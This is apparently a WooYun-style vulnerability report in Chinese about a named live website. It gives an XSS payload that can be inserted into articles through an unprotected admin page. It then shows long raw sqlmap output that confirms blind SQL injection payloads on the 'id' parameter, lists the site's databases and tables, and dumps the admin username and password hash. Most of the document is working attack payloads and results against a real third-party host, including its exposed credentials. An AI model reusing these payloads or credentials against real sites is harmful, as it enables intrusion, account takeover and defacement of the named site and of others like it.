WooYun.org

XSS利用点及注入点
http://www.lqsy.net/app/admin8888.php/Xiuxian/mod_news?id=23671
后台越权访问。可修改文章内容并发布。

可源代码模式。添加XSS代码。这里没有过滤img标签。
<img src = x onerror = "alert(/xss/)">

如果在文章插入恶意代码，用户访问后果可想而知。
-----------------下面是SQL注入----------------------------
POC：
available databases [14]:
[*] app
[*] appcms
[*] dongman
[*] gametools
[*] information_schema
[*] leapi
[*] message
[*] mysql
[*] performance_schema
[*] qxt
[*] sdxf
[*] test
[*] tj
[*] zzzh
[15:58:20] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\
www.lqsy.net'
[*] shutting down at 15:58:20
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:00:31
[16:00:31] [INFO] resuming back-end DBMS 'mysql'
[16:00:31] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=23671 AND 3156=3156
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=23671 AND SLEEP(5)
---
[16:00:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[16:00:32] [INFO] fetching tables for database: 'mysql'
[16:00:32] [INFO] fetching number of tables for database 'mysql'
[16:00:32] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:00:32] [INFO] retrieved:
[16:00:33] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[16:00:34] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
2
[16:00:50] [INFO] adjusting time delay to 1 second due to good response times
4
[16:00:51] [INFO] retrieved:
[16:00:57] [INFO] retrieved: columns_pr
[16:02:04] [ERROR] invalid character detected. retrying..
[16:02:04] [WARNING] increasing time delay to 2 seconds
iv
[16:02:25] [INFO] retrieved: columns_priv
[16:02:33] [INFO] retrieved: columns_priv
[16:02:41] [INFO] retrieved: columns_priv
[16:02:49] [INFO] retrieved: columns_priv
[16:02:57] [INFO] retrieved: columns_priv
[16:03:07] [INFO] retrieved: columns_priv
[16:03:15] [INFO] retrieved: columns_priv
[16:03:23] [INFO] retrieved: columns_priv
[16:03:33] [INFO] retrieved: columns_priv
[16:03:47] [INFO] retrieved: columns_priv
[16:03:56] [INFO] retrieved: columns_priv
[16:04:06] [INFO] retrieved: columns_priv
[16:04:15] [INFO] retrieved: columns_priv
[16:04:23] [INFO] retrieved: columns_priv
[16:04:32] [INFO] retrieved: columns_priv
[16:04:40] [INFO] retrieved: columns_priv
[16:05:06] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
[16:05:14] [INFO] retrieved: columns_priv
[16:05:31] [INFO] retrieved: columns_priv
[16:05:46] [INFO] retrieved: columns_priv
[16:05:58] [INFO] retrieved: columns_priv
[16:06:06] [INFO] retrieved: columns_priv
[16:06:15] [INFO] retrieved: columns_priv
[16:06:23] [INFO] retrieved: columns_priv
Database: mysql
[24 tables]
+--------------+
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
| columns_priv |
+--------------+
[16:06:32] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\
www.lqsy.net'
[*] shutting down at 16:06:32
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:07:11
[16:07:11] [INFO] resuming back-end DBMS 'mysql'
[16:07:11] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=23671 AND 3156=3156
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=23671 AND SLEEP(5)
---
[16:07:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[16:07:11] [INFO] fetching tables for database: 'appcms'
[16:07:11] [INFO] fetching number of tables for database 'appcms'
[16:07:11] [INFO] resumed: 13
[16:07:11] [INFO] resumed: appcms_admin_list
[16:07:11] [INFO] resumed: appcms_app_history
[16:07:11] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:07:11] [INFO] retrieved: appcms_app_list
[16:07:22] [INFO] retrieved: appcms_cate_relation
[16:07:50] [INFO] retrieved: appcms_category
[16:08:01] [INFO] retrieved: appcms_comment
[16:08:17] [INFO] retrieved: appcms_flink
[16:08:29] [INFO] retrieved: appcms_info_list
[16:08:47] [INFO] retrieved: appcms_nlink
[16:08:56] [INFO] retrieved: appcms_recommend_area
[16:09:25] [INFO] retrieved: appcms_resource_list
[16:10:01] [INFO] retrieved: appcms_search_keyword
[16:10:35] [INFO] retrieved: appcms_url_rewrite
Database: appcms
[13 tables]
+-----------------------+
| appcms_admin_list |
| appcms_app_history |
| appcms_app_list |
| appcms_cate_relation |
| appcms_category |
| appcms_comment |
| appcms_flink |
| appcms_info_list |
| appcms_nlink |
| appcms_recommend_area |
| appcms_resource_list |
| appcms_search_keyword |
| appcms_url_rewrite |
+-----------------------+
[16:11:02] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\
www.lqsy.net'
[*] shutting down at 16:11:02
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 16:14:04
[16:14:04] [INFO] resuming back-end DBMS 'mysql'
[16:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=23671 AND 3156=3156
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=23671 AND SLEEP(5)
---
[16:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[16:14:04] [INFO] fetching columns for table 'appcms_admin_list' in database 'ap
pcms'
[16:14:04] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[16:14:04] [INFO] retrieved: 5
[16:14:05] [INFO] retrieved: uid
[16:14:11] [INFO] retrieved: int(11) unsigned
[16:14:42] [INFO] retrieved: uname
[16:15:01] [INFO] retrieved: varchar(100)
[16:15:49] [INFO] retrieved: upass
[16:15:58] [INFO] retrieved: varchar(100)
[16:16:15] [INFO] retrieved: ustate
[16:16:33] [INFO] retrieved: int(2)
[16:16:48] [INFO] retrieved: reg_date
[16:18:00] [INFO] retrieved: int(11)
Database: appcms
Table: appcms_admin_list
[5 columns]
+----------+------------------+
| Column | Type |
+----------+------------------+
| reg_date | int(11) |
| uid | int(11) unsigned |
| uname | varchar(100) |
| upass | varchar(100) |
| ustate | int(2) |
+----------+------------------+
[16:18:46] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\output\
www.lqsy.net'
[*] shutting down at 16:18:46
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutu
consent is illegal. It is the end user's responsibility to obey all applicabl
local, state and federal laws. Developers assume no liability and are not resp
sible for any misuse or damage caused by this program
[*] starting at 16:21:12
[16:21:13] [INFO] resuming back-end DBMS 'mysql'
[16:21:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) req
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=23671 AND 3156=3156
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=23671 AND SLEEP(5)
---
[16:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[16:21:15] [INFO] fetching entries of column(s) 'uname, upass' for table 'appc
_admin_list' in database 'appcms'
[16:21:15] [INFO] fetching number of column(s) 'uname, upass' entries for tabl
'appcms_admin_list' in database 'appcms'
[16:21:15] [WARNING] running in a single-thread mode. Please consider usage of
ption '--threads' for faster data retrieval
[16:21:15] [INFO] retrieved: 1
[16:21:20] [INFO] retrieved: admin
[16:21:56] [INFO] retrieved: 6dcc9c453c3b16adca7dc84adcbdd760
[16:22:50] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'upass'. Do you want to crack th
via a dictionary-based attack? [y/N/q] N
Database: appcms
Table: appcms_admin_list
[1 entry]
+-------+----------------------------------+
| uname | upass |
+-------+----------------------------------+
| admin | 6dcc9c453c3b16adca7dc84adcbdd760 |
+-------+----------------------------------+
[16:26:32] [INFO] table 'appcms.appcms_admin_list' dumped to CSV file 'F:\SqlM
\Bin\output\www.lqsy.net\dump\appcms\appcms_admin_list.csv'
[16:26:32] [INFO] fetched data logged to text files under 'F:\SqlMap\Bin\outpu
www.lqsy.net'
[*] shutting down at 16:26:32